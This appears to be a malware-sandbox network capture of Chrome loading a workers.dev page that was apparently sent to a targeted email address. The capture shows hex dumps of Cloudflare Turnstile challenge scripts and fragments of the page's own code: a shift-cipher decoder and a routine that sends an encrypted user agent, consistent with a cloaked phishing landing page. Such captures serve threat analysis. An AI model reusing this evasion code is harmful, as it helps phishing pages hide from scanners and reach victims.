37 33 29 29 2f 37 29 2b 2d 70 61 72 73 65 49 6e 74 28 67
                                        Data Ascii: go,gp,gw,gA,gB,gF,gG,gH,eO,eP){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(907))/1*(parseInt(gI(804))/2)+parseInt(gI(605))/3+-parseInt(gI(602))/4*(-parseInt(gI(1891))/5)+-parseInt(gI(1129))/6*(-parseInt(gI(773))/7)+-parseInt(g
                                        2025-01-08 23:45:52 UTC1369INData Raw: 3f 67 5b 68 79 28 31 39 34 36 29 5d 3d 4a 53 4f 4e 5b 68 79 28 38 38 37 29 5d 28 67 5b 68 79 28 31 39 34 36 29 5d 2c 4f 62 6a 65 63 74 5b 68 79 28 31 35 37 35 29 5d 28 67 5b 68 79 28 31 39 34 36 29 5d 29 29 3a 67 5b 68 79 28 31 39 34 36 29 5d 3d 4a 53 4f 4e 5b 68 79 28 38 38 37 29 5d 28 67 5b 68 79 28 31 39 34 36 29 5d 29 2c 6d 3d 69 7c 7c 68 79 28 31 31 34 39 29 2c 6e 3d 65 4d 5b 68 79 28 31 31 31 35 29 5d 5b 68 79 28 31 35 36 38 29 5d 3f 6b 5b 68 79 28 31 30 33 36 29 5d 28 6b 5b 68 79 28 37 39 38 29 5d 28 27 68 2f 27 2c 65 4d 5b 68 79 28 31 31 31 35 29 5d 5b 68 79 28 31 35 36 38 29 5d 29 2c 27 2f 27 29 3a 27 27 2c 6f 3d 6b 5b 68 79 28 31 30 33 36 29 5d 28 6b 5b 68 79 28 37 39 38 29 5d 28 6b 5b 68 79 28 37 33 30 29 5d 2b 6e 2b 68 79 28 31 31 35 37 29 2b
                                        Data Ascii: ?g[hy(1946)]=JSON[hy(887)](g[hy(1946)],Object[hy(1575)](g[hy(1946)])):g[hy(1946)]=JSON[hy(887)](g[hy(1946)]),m=i||hy(1149),n=eM[hy(1115)][hy(1568)]?k[hy(1036)](k[hy(798)]('h/',eM[hy(1115)][hy(1568)]),'/'):'',o=k[hy(1036)](k[hy(798)](k[hy(730)]+n+hy(1157)+
                                        2025-01-08 23:45:52 UTC1369INData Raw: 37 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 2c 68 2c 69 2c 6a 2c 68 42 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 76 2c 78 2c 42 2c 43 29 7b 66 6f 72 28 68 42 3d 67 4a 2c 6b 3d 7b 7d 2c 6b 5b 68 42 28 31 38 31 37 29 5d 3d 68 42 28 39 35 32 29 2c 6b 5b 68 42 28 31 32 38 33 29 5d 3d 68 42 28 38 33 33 29 2c 6b 5b 68 42 28 37 33 38 29 5d 3d 68 42 28 37 36 33 29 2c 6c 3d 6b 2c 6d 3d 6c 5b 68 42 28 31 38 31 37 29 5d 5b 68 42 28 39 39 32 29 5d 28 27 7c 27 29 2c 6e 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 6d 5b 6e 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 72 65 74 75 72 6e 21 5b 5d 3b 63 61 73 65 27 31 27 3a 73 3d 28 6f 3d 7b 7d 2c 6f 5b 68 42 28 38 36 33 29 5d 3d 6c 5b 68 42 28 31 32 38 33 29 5d 2c 6f 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32
                                        Data Ascii: 73)]=function(f,g,h,i,j,hB,k,l,m,n,o,s,v,x,B,C){for(hB=gJ,k={},k[hB(1817)]=hB(952),k[hB(1283)]=hB(833),k[hB(738)]=hB(763),l=k,m=l[hB(1817)][hB(992)]('|'),n=0;!![];){switch(m[n++]){case'0':return![];case'1':s=(o={},o[hB(863)]=l[hB(1283)],o);continue;case'2
                                        2025-01-08 23:45:52 UTC1369INData Raw: 35 35 30 29 5d 5b 69 75 28 31 35 38 34 29 5d 28 67 2c 27 2a 27 29 29 29 7d 29 2c 66 5a 3d 21 5b 5d 2c 21 66 71 28 67 4a 28 39 33 37 29 29 26 26 28 67 6e 28 29 2c 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 6a 33 2c 63 2c 64 2c 65 29 7b 6a 33 3d 67 4a 2c 63 3d 7b 27 43 50 4d 6e 69 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 28 29 7d 7d 2c 64 3d 65 4d 5b 6a 33 28 31 31 31 35 29 5d 5b 6a 33 28 35 39 36 29 5d 7c 7c 31 65 34 2c 65 3d 67 6c 28 29 2c 21 65 4d 5b 6a 33 28 31 37 31 39 29 5d 26 26 21 67 30 28 29 26 26 21 65 4d 5b 6a 33 28 39 34 30 29 5d 5b 6a 33 28 31 32 35 35 29 5d 26 26 65 2d 67 6b 3e 64 3f 66 47 28 29 3a 63 5b 6a 33 28 36 33 33 29 5d 28 66 48 29 7d 2c 31 65 33 29 29 2c 67 6f 3d 7b 7d 2c 67 6f 5b 67 4a 28
                                        Data Ascii: 550)][iu(1584)](g,'*')))}),fZ=![],!fq(gJ(937))&&(gn(),setInterval(function(j3,c,d,e){j3=gJ,c={'CPMni':function(f){return f()}},d=eM[j3(1115)][j3(596)]||1e4,e=gl(),!eM[j3(1719)]&&!g0()&&!eM[j3(940)][j3(1255)]&&e-gk>d?fG():c[j3(633)](fH)},1e3)),go={},go[gJ(
                                        2025-01-08 23:45:52 UTC1369INData Raw: 5d 3d 27 75 27 2c 67 41 5b 67 4a 28 34 38 32 29 5d 3d 27 7a 27 2c 67 41 5b 67 4a 28 31 38 32 33 29 5d 3d 27 6e 27 2c 67 41 5b 67 4a 28 31 39 35 32 29 5d 3d 27 49 27 2c 67 41 5b 67 4a 28 31 32 36 30 29 5d 3d 27 62 27 2c 67 42 3d 67 41 2c 65 4d 5b 67 4a 28 31 34 39 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 6a 2c 6a 4e 2c 6f 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 29 7b 69 66 28 6a 4e 3d 67 4a 2c 6f 3d 7b 27 74 4e 4d 42 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3c 48 7d 2c 27 67 6e 69 42 56 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3d 3d 3d 48 7d 2c 27 45 62 41 62 49 27 3a 6a 4e 28 31 34 37 30 29 2c 27 6f 6e 79 76 66 27 3a 6a 4e 28 38 34 33 29 2c 27 68 56 6b 7a 65 27 3a 6a 4e 28 31 37
                                        Data Ascii: ]='u',gA[gJ(482)]='z',gA[gJ(1823)]='n',gA[gJ(1952)]='I',gA[gJ(1260)]='b',gB=gA,eM[gJ(1493)]=function(g,h,i,j,jN,o,x,B,C,D,E,F){if(jN=gJ,o={'tNMBM':function(G,H){return G<H},'gniBV':function(G,H){return G===H},'EbAbI':jN(1470),'onyvf':jN(843),'hVkze':jN(17
                                        2025-01-08 23:45:52 UTC1369INData Raw: 7c 6f 5b 6a 4e 28 39 34 32 29 5d 2c 61 78 5b 6a 4e 28 31 31 31 35 29 5d 5b 6a 4e 28 31 35 36 36 29 5d 3d 61 79 5b 6a 4e 28 31 34 39 37 29 5d 7c 7c 6f 5b 6a 4e 28 39 35 35 29 5d 2c 61 7a 5b 6a 4e 28 31 31 31 35 29 5d 5b 6a 4e 28 31 39 32 31 29 5d 3d 61 41 5b 6a 4e 28 31 33 37 32 29 5d 7c 7c 6a 4e 28 31 37 31 31 29 2c 61 42 5b 6a 4e 28 31 31 31 35 29 5d 5b 6a 4e 28 31 33 31 38 29 5d 3d 61 43 5b 6a 4e 28 31 32 31 37 29 5d 2c 61 44 5b 6a 4e 28 31 31 31 35 29 5d 5b 6a 4e 28 31 36 35 34 29 5d 3d 61 45 2e 63 68 7c 7c 27 27 2c 61 46 5b 6a 4e 28 31 31 31 35 29 5d 5b 6a 4e 28 37 35 39 29 5d 3d 61 47 2e 61 75 7c 7c 27 27 2c 61 48 5b 6a 4e 28 31 31 31 35 29 5d 5b 6a 4e 28 31 32 34 37 29 5d 3d 61 49 5b 6a 4e 28 31 32 34 37 29 5d 7c 7c 7b 7d 2c 61 4a 5b 6a 4e 28 31 31
                                        Data Ascii: |o[jN(942)],ax[jN(1115)][jN(1566)]=ay[jN(1497)]||o[jN(955)],az[jN(1115)][jN(1921)]=aA[jN(1372)]||jN(1711),aB[jN(1115)][jN(1318)]=aC[jN(1217)],aD[jN(1115)][jN(1654)]=aE.ch||'',aF[jN(1115)][jN(759)]=aG.au||'',aH[jN(1115)][jN(1247)]=aI[jN(1247)]||{},aJ[jN(11
                                        2025-01-08 23:45:52 UTC1369INData Raw: 69 5b 6a 51 28 31 30 36 33 29 5d 28 6d 2c 68 5b 6a 5b 6b 5d 5d 5b 6a 51 28 31 35 30 36 29 5d 29 3b 2d 31 3d 3d 3d 67 5b 6c 5d 5b 6a 51 28 37 36 37 29 5d 28 68 5b 6a 5b 6b 5d 5d 5b 6d 5d 29 26 26 28 67 47 28 68 5b 6a 5b 6b 5d 5d 5b 6d 5d 29 7c 7c 67 5b 6c 5d 5b 6a 51 28 31 34 39 31 29 5d 28 27 6f 2e 27 2b 68 5b 6a 5b 6b 5d 5d 5b 6d 5d 29 29 2c 6d 2b 2b 29 3b 7d 65 6c 73 65 20 67 5b 6c 5d 3d 68 5b 6a 5b 6b 5d 5d 5b 6a 51 28 31 39 33 34 29 5d 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 27 6f 2e 27 2b 6e 7d 29 7d 65 6c 73 65 20 69 5b 6a 51 28 31 36 38 36 29 5d 28 6a 2c 69 5b 6a 51 28 31 30 36 32 29 5d 2c 66 75 6e 63 74 69 6f 6e 28 45 2c 6a 52 2c 46 2c 47 29 7b 6a 52 3d 6a 51 2c 46 3d 7b 7d 2c 46 5b 6a 52 28 39 34 35 29 5d 3d 6a 52 28 31 35 35 30
                                        Data Ascii: i[jQ(1063)](m,h[j[k]][jQ(1506)]);-1===g[l][jQ(767)](h[j[k]][m])&&(gG(h[j[k]][m])||g[l][jQ(1491)]('o.'+h[j[k]][m])),m++);}else g[l]=h[j[k]][jQ(1934)](function(n){return'o.'+n})}else i[jQ(1686)](j,i[jQ(1062)],function(E,jR,F,G){jR=jQ,F={},F[jR(945)]=jR(1550
                                        2025-01-08 23:45:52 UTC1369INData Raw: 69 7d 2c 27 67 71 79 76 78 27 3a 6a 54 28 31 39 30 37 29 2c 27 48 7a 79 73 5a 27 3a 6a 54 28 31 36 32 35 29 2c 27 44 42 66 6b 51 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 27 75 77 66 61 58 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 41 5a 79 70 76 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 4f 6a 46 67 48 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 6a 76 52 63 46 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 42 65 62 45 45 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 43 4b 59 7a 6b 27 3a 66 75
                                        Data Ascii: i},'gqyvx':jT(1907),'HzysZ':jT(1625),'DBfkQ':function(h,i){return h*i},'uwfaX':function(h,i){return h<i},'AZypv':function(h,i){return h!=i},'OjFgH':function(h,i){return h(i)},'jvRcF':function(h,i){return h(i)},'BebEE':function(h,i){return i==h},'CKYzk':fu


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        10192.168.2.1649730104.18.94.414432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-08 23:45:52 UTC739OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: image
                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/sr46z/0x4AAAAAAA4FpD7uVAQN4KLZ/auto/fbE/normal/auto/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-08 23:45:52 UTC240INHTTP/1.1 200 OK
                                        Date: Wed, 08 Jan 2025 23:45:52 GMT
                                        Content-Type: image/png
                                        Content-Length: 61
                                        Connection: close
                                        cache-control: max-age=2629800, public
                                        Server: cloudflare
                                        CF-RAY: 8ff0104d8c330f8f-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-08 23:45:52 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                        Data Ascii: PNGIHDRsIDAT$IENDB`


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        11192.168.2.1649723104.21.32.14432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-08 23:45:52 UTC671OUTGET /favicon.ico HTTP/1.1
                                        Host: 2c079db7.df34542e8ba91dbfaec98ed5.workers.dev
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: image
                                        Referer: https://2c079db7.df34542e8ba91dbfaec98ed5.workers.dev/?email=info@acaglobal.com
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-08 23:45:52 UTC790INHTTP/1.1 200 OK
                                        Date: Wed, 08 Jan 2025 23:45:52 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R%2Fa2tyx4yMZfo6BUi2WRPont0MZTbbMMeo9fUzR2xLIrr%2Fykz6BMNY8C5qpN4BaGSi48e0uzpnAi3QQkC1ZNA4zs8FhS7DCniedmHwXLDvDdsAoYRkdv%2FQL%2B4hwdKS3zx0HFgEZvwSjOw7TaUd5xYoAWpPFcmtjpH5SsFZ1SvEs%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8ff0104feafc41a6-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1565&min_rtt=1560&rtt_var=596&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3111&recv_bytes=1249&delivery_rate=2725575&cwnd=242&unsent_bytes=0&cid=0c196596ee5c674b&ts=3320&x=0"
                                        2025-01-08 23:45:52 UTC579INData Raw: 31 36 37 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 20 0a 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75 72 6e 73 74 69 6c 65 2f 76 30 2f 61 70 69 2e 6a 73 3f 6f 6e 6c 6f 61 64 3d 6f 6e 6c 6f 61 64 54 75 72 6e 73 74 69 6c 65 43 61 6c 6c 62 61 63 6b 22 3e 3c 2f 73 63 72 69 70 74 3e 20 0a 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 20 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63
                                        Data Ascii: 1672<!doctype html><html lang="en-US"><head> <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script> <title>Just a moment...</title> <meta content="width=device-width,initial-sc
                                        2025-01-08 23:45:52 UTC1369INData Raw: 20 73 69 74 65 6b 65 79 3a 20 22 30 78 34 41 41 41 41 41 41 41 34 46 70 44 37 75 56 41 51 4e 34 4b 4c 5a 22 2c 20 0a 20 20 20 20 20 20 20 20 63 61 6c 6c 62 61 63 6b 3a 20 76 65 72 69 66 79 43 61 6c 6c 62 61 63 6b 5f 43 46 2c 0a 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 7d 3b 0a 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 68 68 32 28 65 6e 63 72 79 70 74 65 64 54 65 78 74 2c 20 73 68 69 66 74 29 20 7b 0a 20 20 20 20 20 20 6c 65 74 20 64 65 63 72 79 70 74 65 64 54 65 78 74 20 3d 20 22 22 3b 0a 20 20 20 20 20 20 66 6f 72 20 28 6c 65 74 20 69 20 3d 20 30 3b 20 69 20 3c 20 65 6e 63 72 79 70 74 65 64 54 65 78 74 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 20 63 20 3d 20 65 6e 63 72 79 70 74 65 64 54 65 78 74 5b 69 5d 3b 0a 20
                                        Data Ascii: sitekey: "0x4AAAAAAA4FpD7uVAQN4KLZ", callback: verifyCallback_CF, }); }; function hh2(encryptedText, shift) { let decryptedText = ""; for (let i = 0; i < encryptedText.length; i++) { let c = encryptedText[i];
                                        2025-01-08 23:45:52 UTC1369INData Raw: 20 20 66 75 6e 63 74 69 6f 6e 20 73 65 6e 64 52 65 71 75 65 73 74 28 29 20 7b 0a 20 20 20 20 20 20 63 6f 6e 73 74 20 75 73 65 72 41 67 65 6e 74 20 3d 20 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 3b 0a 20 20 20 20 20 20 63 6f 6e 73 74 20 45 6e 63 72 79 70 74 65 64 55 73 65 72 41 67 65 6e 74 20 3d 20 45 6e 63 72 79 70 74 28 75 73 65 72 41 67 65 6e 74 2c 20 50 55 42 4c 49 43 5f 4b 45 59 29 3b 0a 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 27 53 65 6e 64 69 6e 67 20 72 65 71 75 65 73 74 20 77 69 74 68 20 65 6e 63 72 79 70 74 65 64 20 75 73 65 72 2d 61 67 65 6e 74 3a 27 2c 20 45 6e 63 72 79 70 74 65 64 55 73 65 72 41 67 65 6e 74 29 3b 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 6c 65 74 20 78 68 72 20 3d 20 6e 65 77 20 58 4d 4c 48 74 74
                                        Data Ascii: function sendRequest() { const userAgent = navigator.userAgent; const EncryptedUserAgent = Encrypt(userAgent, PUBLIC_KEY); console.log('Sending request with encrypted user-agent:', EncryptedUserAgent); let xhr = new XMLHtt
                                        2025-01-08 23:45:52 UTC1369INData Raw: 61 6e 73 70 61 72 65 6e 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 30 30 35 31 63 33 7d 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 7d 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 38 72 65 6d 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 7d 2e 66 6f 6f 74 65 72 2c 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 2e 35 72 65 6d 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69
                                        Data Ascii: ansparent;text-decoration:none;color:#0051c3}a:hover{text-decoration:underline;color:#ee730a}.main-content{margin:8rem auto;width:100%;max-width:60rem}.footer,.main-content{padding-right:1.5rem;padding-left:1.5rem}.main-wrapper{display:flex;flex:1;flex-di
                                        2025-01-08 23:45:52 UTC1068INData Raw: 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32 3b 63 6f 6c 6f 72 3a 23 64 39 64 39 64 39 7d 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 7d 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 77 72 61 70 70 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 68 31 20 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 22
                                        Data Ascii: scheme:dark){body{background-color:#222;color:#d9d9d9}a{color:#fff}a:hover{text-decoration:underline;color:#ee730a}}</style><body class="no-js"> <div class="main-wrapper" role="main"> <div class="main-content"> <h1 class="h1 zone-name-title"
                                        2025-01-08 23:45:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        12192.168.2.1649731104.18.94.414432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-08 23:45:52 UTC385OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-08 23:45:52 UTC240INHTTP/1.1 200 OK
                                        Date: Wed, 08 Jan 2025 23:45:52 GMT
                                        Content-Type: image/png
                                        Content-Length: 61
                                        Connection: close
                                        cache-control: max-age=2629800, public
                                        Server: cloudflare
                                        CF-RAY: 8ff010515d4b42ce-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-08 23:45:52 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                        Data Ascii: PNGIHDRsIDAT$IENDB`


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        13192.168.2.1649732104.18.94.414432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-08 23:45:53 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ff01048fb6d4364&lang=auto HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-08 23:45:53 UTC331INHTTP/1.1 200 OK
                                        Date: Wed, 08 Jan 2025 23:45:53 GMT
                                        Content-Type: application/javascript; charset=UTF-8
                                        Content-Length: 118190
                                        Connection: close
                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        Server: cloudflare
                                        CF-RAY: 8ff01052ec1b184d-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-08 23:45:53 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 71 51 4c 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46
                                        Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2F
                                        2025-01-08 23:45:53 UTC1369INData Raw: 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 69 66 72 61 6d 65 5f 61 6c 74 22 3a 22 57 69 64 67 65 74 25 32 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 76 65 72 69 66 79 69 6e 67 22 3a 22 56 65 72 69 66 79 69 6e 67 2e 2e 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 70 72 69 76 61 63 79 22 3a 22 50 72 69 76 61 63 79 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 74 65 72 6d 73 22 3a 22 54 65 72 6d 73 22 2c 22 68 75 6d 61 6e 5f 62 75 74 74 6f 6e 5f 74 65 78 74 22 3a 22 56 65 72 69 66 79 25 32 30 79 6f 75 25 32 30 61 72 65 25 32 30 68 75 6d 61 6e 22 2c
                                        Data Ascii: %20persists.","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","turnstile_verifying":"Verifying...","turnstile_footer_privacy":"Privacy","turnstile_footer_terms":"Terms","human_button_text":"Verify%20you%20are%20human",
